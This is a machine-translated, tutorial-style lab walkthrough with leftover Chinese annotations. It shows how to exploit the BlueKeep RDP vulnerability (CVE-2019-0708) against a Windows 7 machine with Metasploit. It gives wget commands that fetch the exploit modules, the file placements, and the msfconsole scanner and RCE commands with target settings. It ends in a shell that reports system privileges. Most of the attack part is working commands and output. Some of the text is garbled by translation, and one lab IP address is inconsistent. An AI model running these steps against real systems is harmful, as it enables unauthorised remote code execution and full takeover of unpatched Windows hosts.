First, the vulnerability note
May 15, 2019, Microsoft released a security patch to fix CVE number CVE-2019-0708 Windows Remote Desktop Services (RDP) remote code execution vulnerability in the case of remotely without authentication trigger, and the impact was tremendous harm.
Currently, September 7 EXP code has been publicly released to Pull requests metasploit-framework, the can has been tested and execute remote code.
Second, the version of
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
Another way is in addition win8 and win10, almost all versions have this vulnerability
Third, begin to attack
is still our old actor:
Kali machine: 192.138.198.134
Win7: 192.168.198.138
Ready to work:
win7
1. Close win7 firewall
2. open port 3389 (Remote Desktop Connection)
3. sit, to be Day
kali:
1. Update your msf (kali if your version is 2019.4 and later, you can skip this step)
apt-get install metasploit-framework -->更新metasploit
2. Download this vulnerability exp
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
3. Add or replace the downloaded file to the appropriate directory
rdp.rb - > /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb -->替换
rdp_scanner.rb - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb -->替换
cve_2019_0708_bluekeep.rb - > /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb -->替换
cve_2019_0708_bluekeep_rce.rb - > /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb -->添加
Started
started msfconsole, 0708 signature search
msfconsole -->启动msf
search 0708 -->搜索关于0708的所有文件或模块
See No. 0
auxiliary/scanner/rdp/cve_2019_0708_bluekeep -->探测此漏洞模块
Let's use it and see what it needs to detect which parameters
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep -->使用此模块
show options -->查看所需参数
Here we find all the parameters to yes there is only RHOSTS (host address) is empty, then we set about to address a host of drone
set RHOSTS 192.168.198.138 -->设置RHOSTS的值为192.168.198.138
exploit -->开始攻击
After a few seconds, to obtain the results
see the bottom fifth row:
of The IS target of Vulnerable of The Cleanup The incorrectly attempted The target-bound MS_T120 Channel..
Too lazy to translate their own Baidu to go, anyway, to the effect that this host may be affected by this vulnerability
Since there are loopholes, then we begin to attack
See No. 1 of 3
exploit/windows/rdp/cve_2019_0708_bluekeep_rce
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce -->使用攻击模块
show options -->查看所需参数
set RHOSTS 192.168.198.138 -->设置RHOSTS的值为192.168.198.138
set target 2 -->设置受害机器的架构(可选参数0-7)
Here different from the past, need to set the parameters of architecture, the children do not forget, oh
later set the parameters, you can begin to attack
exploit -->开始攻击
When appears Command shell session 1 opened, to prove that you have a successful attack
this time you only need to press the Enter can
we take a look at the effect of
run whoami, echoing system permissions
to run ipconfig, echoing 192.168.198.138
Okay, successfully won
Gee, our poor win7
Goes often say
what do not understand welcome private letter
if I have what point did not speak clearly, please comment